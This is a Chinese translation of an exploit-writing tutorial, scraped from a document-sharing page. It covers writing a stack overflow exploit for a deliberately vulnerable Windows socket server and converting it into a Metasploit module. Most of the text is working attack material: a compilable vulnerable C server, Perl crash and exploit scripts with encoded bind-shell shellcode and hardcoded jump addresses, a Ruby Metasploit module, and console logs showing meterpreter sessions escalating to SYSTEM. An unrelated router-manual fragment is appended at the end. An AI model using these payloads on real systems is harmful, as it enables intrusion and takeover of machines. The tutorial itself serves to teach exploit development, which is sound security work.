WSADATA wsadata; int rval; char Message[5000]=""; char buf[2000]=""; u_short LocalPort; LocalPort = 200; //wsock32 initialized for usage sockversion =

Size: px

Start display at page:

Download "WSADATA wsadata; int rval; char Message[5000]=""; char buf[2000]=""; u_short LocalPort; LocalPort = 200; //wsock32 initialized for usage sockversion ="

巅凤
6 years ago
Views:

1 Exploit 编写系列教程第四篇 : 编写 Metasploit exploit 作者 :Peter Van Eeckhoutte 译者 :riusksk( 泉哥 : 在 exploit 编写系列教程第一篇中, 笔者已经讲述了两种对于常见漏洞的利用方式 : 栈溢出 ( 覆盖 EIP) 与利用 SHE 链表进行栈溢出在列出的例子中, 笔者已经利用 perl 脚本去演示如何构造一个可行的 exploit 显然, 编写 exploit 不应局制于 perl 语言上笔者猜想 : 每种编程语言都可以用于编写 exploit 因此你可以挑选自己最为熟悉的一种语言来编写 exploit( 比如 python,c,c++,c# 等等 ) 尽管也许自己编写出来的 exploit 勉强可用, 但如果可以将其列入自己的 Metasploit Framework 中可能会更好, 因为这样就可以利用 Metasploit 的一些独特功能 Metasploit exploit 模块结构一个典型的 Metasploit exploit module 由以下部分组成 : header and some dependencies Some comments about the exploit module require msf/core class definition includes def definitions : initialize check (optional) exploit 读者可以在 metasploit module 中使用 # 来添加注释, 上面这些就是我们现在需要知道的, 接下来我们看看建立 Metasploit exploit module 所需要的每一步骤案例研究 : 编写针对漏洞服务器的 exploit 下面我们将以下列存在漏洞的服务端代码 (C) 来演示 exploit 的编写 : #include <iostream.h> #include <winsock.h> #include <windows.h> //load windows socket #pragma comment(lib, "wsock32.lib") //Define Return Messages #define SS_ERROR 1 #define SS_OK 0 void pr( char *str) char buf[500]=""; strcpy(buf,str); void serror(char *str) MessageBox (NULL, str, "socket Error",MB_OK); WSACleanup(); int main(int argc, char **argv) WORD sockversion;

2 WSADATA wsadata; int rval; char Message[5000]=""; char buf[2000]=""; u_short LocalPort; LocalPort = 200; //wsock32 initialized for usage sockversion = MAKEWORD(1,1); WSAStartup(sockVersion, &wsadata); //create server socket SOCKET serversocket = socket(af_inet, SOCK_STREAM, 0); if(serversocket == INVALID_SOCKET) serror("failed socket()"); return SS_ERROR; SOCKADDR_IN sin; sin.sin_family = PF_INET; sin.sin_port = htons(localport); sin.sin_addr.s_addr = INADDR_ANY; //bind the socket rval = bind(serversocket, (LPSOCKADDR)&sin, sizeof(sin)); if(rval == SOCKET_ERROR) serror("failed bind()"); WSACleanup(); return SS_ERROR; //get socket to listen rval = listen(serversocket, 10); if(rval == SOCKET_ERROR) serror("failed listen()"); WSACleanup(); return SS_ERROR; //wait for a client to connect SOCKET clientsocket; clientsocket = accept(serversocket, NULL, NULL); if(clientsocket == INVALID_SOCKET) serror("failed accept()"); WSACleanup(); return SS_ERROR; int bytesrecv = SOCKET_ERROR; while( bytesrecv == SOCKET_ERROR ) //receive the data that is being sent by the client max limit to 5000 bytes.

3 bytesrecv = recv( clientsocket, Message, 5000, 0 ); if ( bytesrecv == 0 bytesrecv == WSAECONNRESET ) printf( "\nconnection Closed.\n"); break; //Pass the data received to the function pr pr(message); //close client socket closesocket(clientsocket); //close server socket closesocket(serversocket); WSACleanup(); return SS_OK; 编译以上代码, 然后在 Windows 2003 server R2 SP2 下运行 ( 笔者用 lcc-win32 来编译代码 ) 当你发送 1000 字节到服务端时, 服务器将崩溃下面的 perl 脚本可触发程序崩溃 : use strict; use Socket; my $junk = "\x41" x1000; # initialize host and port my $host = shift 'localhost'; my $port = shift 200; my $proto = getprotobyname('tcp'); # get the port address my $iaddr = inet_aton($host); my $paddr = sockaddr_in($port, $iaddr); print "[+] Setting up socket\n"; # create the socket, connect to the port socket(socket, PF_INET, SOCK_STREAM, $proto) or die "socket: $!"; print "[+] Connecting to $host on port $port\n"; connect(socket, $paddr) or die "connect: $!"; print "[+] Sending payload\n"; print SOCKET $junk."\n"; print "[+] Payload sent\n"; close SOCKET or die "close: $!"; 存在漏洞的服务端挂掉, 同时 EIP 被 A s 覆盖掉 : 0:001> g (e00.de0): Access violation - code c (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0012e05c ebx=7ffd6000 ecx= edx=0012e446 esi=0040bdec edi=0012ebe0 eip= esp=0012e258 ebp= iopl=0 nv up ei pl nz ac po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl= ????? 利用 Mestasploit pattern, 我们可确定覆盖 EIP 的偏移量为 504 字节下面我们将重新编写一份可触发程序崩溃的脚本以证实这一偏移量, 同时注意溢出后各寄存器的值 : use strict;

4 use Socket; my $totalbuffer=1000; my $junk = "\x41" x 504; my $eipoverwrite = "\x42" x 4; my $junk2 = "\x43" x ($totalbuffer-length($junk.$eipoverwrite)); # initialize host and port my $host = shift 'localhost'; my $port = shift 200; my $proto = getprotobyname('tcp'); # get the port address my $iaddr = inet_aton($host); my $paddr = sockaddr_in($port, $iaddr); print "[+] Setting up socket\n"; # create the socket, connect to the port socket(socket, PF_INET, SOCK_STREAM, $proto) or die "socket: $!"; print "[+] Connecting to $host on port $port\n"; connect(socket, $paddr) or die "connect: $!"; print "[+] Sending payload\n"; print SOCKET $junk.$eipoverwrite.$junk2."\n"; print "[+] Payload sent\n"; close SOCKET or die "close: $!"; 发送 504 A s,4 B s 以及一串 C s 后, 可以看到以下寄存器及栈中的内容 : 0:001> g (ed0.eb0): Access violation - code c (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0012e05c ebx=7ffde000 ecx= edx=0012e446 esi=0040bdec edi=0012ebe0 eip= esp=0012e258 ebp= iopl=0 nv up ei pl nz ac po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl= ????? 0:000> d esp 0012e CCCCCCCCCCCCCCCC 0012e CCCCCCCCCCCCCCCC 0012e CCCCCCCCCCCCCCCC 0012e CCCCCCCCCCCCCCCC 0012e CCCCCCCCCCCCCCCC 0012e2a CCCCCCCCCCCCCCCC 0012e2b CCCCCCCCCCCCCCCC 0012e2c CCCCCCCCCCCCCCCC 下面增加 junk size, 看看有多少可用空间能存放 shellcode 这是相当重要的, 因为你将需要在 Metasploit module 中指定这一参数更改 $totalbuffer 的值为 2000, 正如所预期的一样, 溢出漏洞仍被触发了 ESP 的内容表示我们可以用 C s 填充内存到 esp+5d3 (1491 bytes) 以上将是我们的 shellcode 空间 ( 或多或少 ) 我们需要用 jmp esp( 或 call esp, 或其它等同指令 ) 覆盖 EIP, 再用 shellcode 去替换掉 C s, 这样 exploit 应该就可以工作得很好了利用 findjmp, 我们可以在 Windows 2003 R2 SP2 server 中搜索到可利用的地址 :

5 findjmp.exe ws2_32.dll esp Reg: esp Scanning ws2_32.dll for code usable with the esp register 0x71C02B67 push esp - ret Finished Scanning ws2_32.dll for code usable with the esp register Found 1 usable addresses 结合 shellcode 进行测试后, 我们可利用以下两点来完成最终的 exploit: 从 shellcode 中排除 0xff 在 shellcode 前放置一串 NOP s 最终的 exploit ( 用 perl 编写的, 将 shell 绑定到 TCP 端口 5555): # print " \n"; print " Writing Buffer Overflows\n"; print " Peter Van Eeckhoutte\n"; print " print " \n"; print " Exploit for vulnserver.c\n"; print " \n"; use strict; use Socket; my $junk = "\x90" x 504; #jmp esp (from ws2_32.dll) my $eipoverwrite = pack('v',0x71c02b67); #add some NOP's my $shellcode="\x90" x 50; # windows/shell_bind_tcp bytes # # Encoder: x86/alpha_upper # EXITFUNC=seh, LPORT=5555, RHOST= $shellcode=$shellcode."\x89\xe0\xd9\xd0\xd9\x70\xf4\x59\x49\x49\x49\x49\x49\x43". "\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58". "\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42". "\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30". "\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x42\x4a". "\x4a\x4b\x50\x4d\x4d\x38\x4c\x39\x4b\x4f\x4b\x4f\x4b\x4f". "\x45\x30\x4c\x4b\x42\x4c\x51\x34\x51\x34\x4c\x4b\x47\x35". "\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x44\x38\x45\x51\x4a\x4f". "\x4c\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x47\x50\x43\x31". "\x4a\x4b\x47\x39\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e". "\x50\x31\x49\x50\x4a\x39\x4e\x4c\x4c\x44\x49\x50\x42\x54". "\x45\x57\x49\x51\x48\x4a\x44\x4d\x45\x51\x48\x42\x4a\x4b". "\x4c\x34\x47\x4b\x46\x34\x46\x44\x51\x38\x42\x55\x4a\x45". "\x4c\x4b\x51\x4f\x51\x34\x43\x31\x4a\x4b\x43\x56\x4c\x4b". "\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b". "\x44\x43\x46\x4c\x4c\x4b\x4b\x39\x42\x4c\x51\x34\x45\x4c". "\x45\x31\x49\x53\x46\x51\x49\x4b\x43\x54\x4c\x4b\x51\x53". "\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c". "\x4e\x4d\x4c\x4b\x51\x50\x44\x48\x51\x4e\x43\x58\x4c\x4e". "\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f\x4e\x36\x45\x36".

6 "\x51\x43\x42\x46\x43\x58\x46\x53\x47\x42\x45\x38\x43\x47". "\x44\x33\x46\x52\x51\x4f\x46\x34\x4b\x4f\x48\x50\x42\x48". "\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x48\x56". "\x51\x4f\x4c\x49\x4d\x35\x43\x56\x4b\x31\x4a\x4d\x45\x58". "\x44\x42\x46\x35\x43\x5a\x43\x32\x4b\x4f\x4e\x30\x45\x38". "\x48\x59\x45\x59\x4a\x55\x4e\x4d\x51\x47\x4b\x4f\x48\x56". "\x51\x43\x50\x53\x50\x53\x46\x33\x46\x33\x51\x53\x50\x53". "\x47\x33\x46\x33\x4b\x4f\x4e\x30\x42\x46\x42\x48\x42\x35". "\x4e\x53\x45\x36\x50\x53\x4b\x39\x4b\x51\x4c\x55\x43\x58". "\x4e\x44\x45\x4a\x44\x30\x49\x57\x46\x37\x4b\x4f\x4e\x36". "\x42\x4a\x44\x50\x50\x51\x50\x55\x4b\x4f\x48\x50\x45\x38". "\x49\x34\x4e\x4d\x46\x4e\x4a\x49\x50\x57\x4b\x4f\x49\x46". "\x46\x33\x50\x55\x4b\x4f\x4e\x30\x42\x48\x4d\x35\x51\x59". "\x4c\x46\x51\x59\x51\x47\x4b\x4f\x49\x46\x46\x30\x50\x54". "\x46\x34\x50\x55\x4b\x4f\x48\x50\x4a\x33\x43\x58\x4b\x57". "\x43\x49\x48\x46\x44\x39\x51\x47\x4b\x4f\x4e\x36\x46\x35". "\x4b\x4f\x48\x50\x43\x56\x43\x5a\x45\x34\x42\x46\x45\x38". "\x43\x53\x42\x4d\x4b\x39\x4a\x45\x42\x4a\x50\x50\x50\x59". "\x47\x59\x48\x4c\x4b\x39\x4d\x37\x42\x4a\x47\x34\x4c\x49". "\x4b\x52\x46\x51\x49\x50\x4b\x43\x4e\x4a\x4b\x4e\x47\x32". "\x46\x4d\x4b\x4e\x50\x42\x46\x4c\x4d\x43\x4c\x4d\x42\x5a". "\x46\x58\x4e\x4b\x4e\x4b\x4e\x4b\x43\x58\x43\x42\x4b\x4e". "\x48\x33\x42\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x48\x56". "\x51\x4b\x46\x37\x50\x52\x50\x51\x50\x51\x50\x51\x43\x5a". "\x45\x51\x46\x31\x50\x51\x51\x45\x50\x51\x4b\x4f\x4e\x30". "\x43\x58\x4e\x4d\x49\x49\x44\x45\x48\x4e\x46\x33\x4b\x4f". "\x48\x56\x43\x5a\x4b\x4f\x4b\x4f\x50\x37\x4b\x4f\x4e\x30". "\x4c\x4b\x51\x47\x4b\x4c\x4b\x33\x49\x54\x42\x44\x4b\x4f". "\x48\x56\x51\x42\x4b\x4f\x48\x50\x43\x58\x4a\x50\x4c\x4a". "\x43\x34\x51\x4f\x50\x53\x4b\x4f\x4e\x36\x4b\x4f\x48\x50". "\x41\x41"; # initialize host and port my $host = shift 'localhost'; my $port = shift 200; my $proto = getprotobyname('tcp'); # get the port address my $iaddr = inet_aton($host); my $paddr = sockaddr_in($port, $iaddr); print "[+] Setting up socket\n"; # create the socket, connect to the port socket(socket, PF_INET, SOCK_STREAM, $proto) or die "socket: $!"; print "[+] Connecting to $host on port $port\n"; connect(socket, $paddr) or die "connect: $!"; print "[+] Sending payload\n"; print SOCKET $junk.$eipoverwrite.$shellcode."\n"; print "[+] Payload sent\n"; print "[+] Attempting to telnet to $host on port \n"; system("telnet $host 5555"); close SOCKET or die "close: $!";

7 Exploit output : root@backtrack4:/tmp# perl sploit.pl Writing Buffer Overflows Peter Van Eeckhoutte Exploit for vulnserver.c [+] Setting up socket [+] Connecting to on port 200 [+] Sending payload [+] Payload sent [+] Attempting to telnet to on port Trying Connected to Escape character is '^]'. Microsoft Windows [Version ] (C) Copyright Microsoft Corp. C:\vulnserver\lcc>whoami whoami win \administrator 这份 exploit 中最为重要几点因素有 : ret( 覆盖 EIP) 的偏移量为 504 Windows 2003 R2 SP2 (English) 跳转地址为 0x71C02B67 shellcode 中不应包含有 0x00 或者 0xff shellcode 至少应 1400 字节在 Windows XP SP3(English) 中再运行以上测试代码后, 我们得到的以上偏移量是一样的, 但跳转地址改变了 ( 例如 :0x7c874413) 下面我们将利用 Metasploit module 来选择这两个地址中的一个, 以实现正确的跳转地址将 exploit 转换为 metasploit 首先, 你需要确定 exploit 将为何种类型, 因为这决定了 exploit 将保存在 Metasploit 文件结构中的位置如果你的 exploit 是针对 windows ftp server 的, 那么需要将其保存在 windows ftp server exploits 中 Metasploit modules 是保存在 framework3xx 文件结构中, 位于 /modules/exploits 目录下在该文件夹中,exploits 先细分为操作系统类型, 再细分为服务类型由于我们的 FTP 服务是运行在 windows 中的, 因此将 exploit 放置于 windows 目录下 Windows 文件夹中已经包含许多文件了, 包括一个 misc 文件我们将 exploit 放置在 misc 目录下 ( 或者放置在 telnet 目录下 ), 因为它并不真正地属于其它类型我们在 %metasploit%/modules/windows/misc 目录中创建 Metasploit module: root@backtrack4:/# cd /pentest/exploits/framework3/modules/exploits/windows/misc root@backtrack4:/pentest/exploits/framework3/modules/exploits/windows/misc# vi custom_vulnserver.rb # # # Custom metasploit exploit for vulnserver.c # Written by Peter Van Eeckhoutte # # require 'msf/core'

8 class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp def initialize(info = ) super(update_info(info, 'Name' => 'Custom vulnerable server stack overflow', 'Description' => %q This module exploits a stack overflow in a custom vulnerable server., 'Author' => [ 'Peter Van Eeckhoutte' ], 'Version' => '$Revision: 9999 $', 'DefaultOptions' => 'EXITFUNC' => 'process',, 'Payload' => 'Space' => 1400, 'BadChars' => "\x00\xff",, 'Platform' => 'win', 'Targets' => [ ['Windows XP SP3 En', 'Ret' => 0x7c874413, 'Offset' => 504 ], ['Windows 2003 Server R2 SP2', 'Ret' => 0x71c02b67, 'Offset' => 504 ], ], 'DefaultTarget' => 0, 'Privileged' => false )) register_options( [ Opt::RPORT(200) ], self.class) end def exploit connect junk = make_nops(target['offset']) sploit = junk + [target.ret].pack('v') + make_nops(50) + payload.encoded sock.put(sploit) handler disconnect end end 下面看看其各组成部分 : 首先, 写入 require msf/core, 这对于所有 Mestasploit exploits 均有效定义 class, 本例中为 remote exploit 然后, 设置 exploit information 和 exploit definitions:

9 include: 本例中显然为 tcp connection, 因此我们使用 Msf::Exploit::Remote::Tcp Metasploit 支持 http,fcp 等等 ( 这将帮助你更快地建立 exploit, 因为这无需你来完成整个会话过程 ) information: Payload: 定义 badchars 的长度 ( 在本例为 0x00 和 0xff) 定义 targets, 以及 target 特有的设置, 如 return address,offset 等等 Exploit connect ( 设置远程连接端口 ) 创建缓冲区 junk(nops,offset size) 添加返回地址,nops 以及编码的 payload 写入连接的缓冲区处理 exploit 断开连接现在打开 msfconsole, 如果存在脚本错误, 那么当 msfconsole 加载时将显示相关的错误信息如果 msfconsole 已加载, 那么你必须在使用此新 module 前将 msfconsole 关掉 ( 或者刷新模块, 如果你对其进行修改的话 ) 测试 exploit Test 1 : Windows XP SP3 root@backtrack4:/pentest/exploits/framework3#./msfconsole _) ` \ _ \ _` \ _ \ / ( \ \ ( _ _ _ \ \ \,_ /. / _ \ / _ \ _ =[ msf v3.3-dev =[ 395 exploits payloads =[ 20 encoders - 7 nops =[ 187 aux msf > use windows/misc/custom_vulnserver msf exploit(custom_vulnserver) > show options Module options: Name Current Setting Required Description RHOST yes The target address RPORT 200 yes The target port Exploit target: Id Name Windows XP SP3 En msf exploit(custom_vulnserver) > set rhost rhost => msf exploit(custom_vulnserver) > show targets Exploit targets: Id Name Windows XP SP3 En 1 Windows 2003 Server R2 SP2 msf exploit(custom_vulnserver) > set target 0 target => 0

10 msf exploit(custom_vulnserver) > set payload windows/meterpreter/bind_tcp payload => windows/meterpreter/bind_tcp msf exploit(custom_vulnserver) > show options Module options: Name Current Setting Required Description RHOST yes The target address RPORT 200 yes The target port Payload options (windows/meterpreter/bind_tcp): Name Current Setting Required Description EXITFUNC process yes Exit technique: seh, thread, process LPORT 4444 yes The local port RHOST no The target address Exploit target: Id Name Windows XP SP3 En msf exploit(custom_vulnserver) > exploit [*] Started bind handler [*] Transmitting intermediate stager for over-sized stage...(216 bytes) [*] Sending stage ( bytes) [*] Meterpreter session 1 opened ( : > :4444) meterpreter > sysinfo Computer: SPLOITBUILDER1 OS : Windows XP (Build 2600, Service Pack 3). Test 2 : Windows 2003 Server R2 SP2 meterpreter > meterpreter > quit [*] Meterpreter session 1 closed. msf exploit(custom_vulnserver) > set rhost rhost => msf exploit(custom_vulnserver) > set target 1 target => 1 msf exploit(custom_vulnserver) > show options Module options: Name Current Setting Required Description RHOST yes The target address RPORT 200 yes The target port Payload options (windows/meterpreter/bind_tcp): Name Current Setting Required Description EXITFUNC process yes Exit technique: seh, thread, process LPORT 4444 yes The local port RHOST no The target address Exploit target: Id Name

11 Windows 2003 Server R2 SP2 msf exploit(custom_vulnserver) > exploit [*] Started bind handler [*] Transmitting intermediate stager for over-sized stage...(216 bytes) [*] Sending stage ( bytes) [*] Meterpreter session 2 opened ( : > :4444) meterpreter > sysinfo Computer: WIN OS : Windows.NET Server (Build 3790, Service Pack 2). meterpreter > getuid Server username: WIN \Administrator meterpreter > ps Process list ============ PID Name Path smss.exe \SystemRoot\System32\smss.exe 372 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe 396 Explorer.EXE C:\WINDOWS\Explorer.EXE 420 services.exe C:\WINDOWS\system32\services.exe 424 ctfmon.exe C:\WINDOWS\system32\ctfmon.exe 432 lsass.exe C:\WINDOWS\system32\lsass.exe 652 svchost.exe C:\WINDOWS\system32\svchost.exe 832 svchost.exe C:\WINDOWS\System32\svchost.exe 996 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe 1132 svchost.exe C:\WINDOWS\System32\svchost.exe 1392 dllhost.exe C:\WINDOWS\system32\dllhost.exe 1580 svchost.exe C:\WINDOWS\System32\svchost.exe 1600 svchost.exe C:\WINDOWS\System32\svchost.exe 2352 cmd.exe C:\WINDOWS\system32\cmd.exe 2888 vulnserver.exe C:\vulnserver\lcc\vulnserver.exe meterpreter > migrate 996 [*] Migrating to [*] Migration completed successfully. meterpreter > getuid Server username: NT AUTHORITY\SYSTEM 关于 Metasploit API 的更多信息关于 Metasploit API 的更多信息可以查看以下链接 :

IP505SM_manual_cn.doc

IP505SM_manual_cn.doc IP505SM 1 Introduction 1...4...4...4...5 LAN...5...5...6...6...7 LED...7...7 2...9...9...9 3...11...11...12...12...12...14...18 LAN...19 DHCP...20...21 4 PC...22...22 Windows...22 TCP/IP -...22 TCP/IP